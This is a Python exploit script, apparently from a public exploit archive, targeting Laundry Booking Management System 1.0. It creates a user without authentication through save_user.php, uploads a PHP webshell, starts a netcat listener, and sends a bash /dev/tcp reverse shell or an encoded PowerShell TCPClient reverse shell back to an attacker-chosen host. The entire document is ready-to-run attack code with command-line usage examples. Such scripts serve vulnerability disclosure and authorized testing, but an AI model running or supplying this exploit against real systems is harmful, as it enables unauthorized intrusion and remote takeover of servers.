# Exploit Title: Laundry Booking Management System 1.0 - Remote Code Execution (RCE) # Date: 29/11/2021 # Exploit Author: Pablo Santiago # Vendor Homepage: https://www.sourcecodester.com/php/14400/laundry-booking-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/laundry_sourcecode.zip # Version: 1.0 # Tested on: Windows 7 and Ubuntu 21.10 # Vulnerability: Its possible create an user without being authenticated, # in this request you can upload a simple webshell which will used to get a # reverse shell import re, sys, argparse, requests, time, os import subprocess, pyfiglet ascii_banner = pyfiglet.figlet_format("Laundry") print(ascii_banner) print(" Booking Management System\n") print("----[Broken Access Control to RCE]----\n") class Exploit: def __init__(self,target, shell_name,localhost,localport,os): self.target=target self.shell_name=shell_name self.localhost=localhost self.localport=localport self.LHL= '/'.join([localhost,localport]) self.HPW= "'"+localhost+"'"+','+localport self.os=os self.session = requests.Session() #self.http_proxy = "http://127.0.0.1:8080" #self.https_proxy = "https://127.0.0.1:8080" #self.proxies = {"http" : self.http_proxy, # "https" : self.https_proxy} self.headers= {'Cookie': 'PHPSESSID= Broken Access Control'} def create_user(self): url = self.target+"/pages/save_user.php" data = { "fname":"bypass", "email":"bypass@bypass.com", "password":"password", "group_id": "2", } #Creates user "bypass" and upload a simple webshell without authentication request = self.session.post(url, data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"")}) time.sleep(3) if (request.status_code == 200): print('[*] The user and webshell were created\n') else: print('Something was wront...!') def execute_shell(self): if self.os == "linux": time.sleep(3) print("[*] Starting reverse shell\n") subprocess.Popen(["nc","-nvlp", self.localport]) time.sleep(3) #Use a payload in bash to get a reverse shell payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"' execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload try: request_rce = requests.get(execute_command) print(request_rce.text) except requests.exceptions.ReadTimeout: pass elif self.os == "windows": time.sleep(3) print("[*] Starting reverse shell\n") subprocess.Popen(["nc","-nvlp", self.localport]) time.sleep(3) #Use a payload in powershell to get a reverse shell payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) {%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload try: request_rce = requests.get(execute_command) print(request_rce.text) except requests.exceptions.ReadTimeout: pass else: print('Windows or linux') def get_args(): parser = argparse.ArgumentParser(description='Laundry Booking Management System') parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url') parser.add_argument('-s', '--shell_name', dest="shell_name", required=True, action='store', help='shell_name') parser.add_argument('-l', '--localhost', dest="localhost", required=True, action='store', help='local host') parser.add_argument('-p', '--localport', dest="localport", required=True, action='store', help='local port') parser.add_argument('-os', '--os', choices=['linux', 'windows'], dest="os", required=True, action='store', help='linux,windows') args = parser.parse_args() return args args = get_args() target = args.target shell_name = args.shell_name localhost = args.localhost localport = args.localport xp = Exploit(target, shell_name,localhost,localport,args.os) xp.create_user() xp.execute_shell() #Example software vulnerable installed in windows:python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os windows #Example software vulnerable installed in linux: python3 exploit.py -t http://IP/path -s rce -l 192.168.1.128 -p 443 -os linux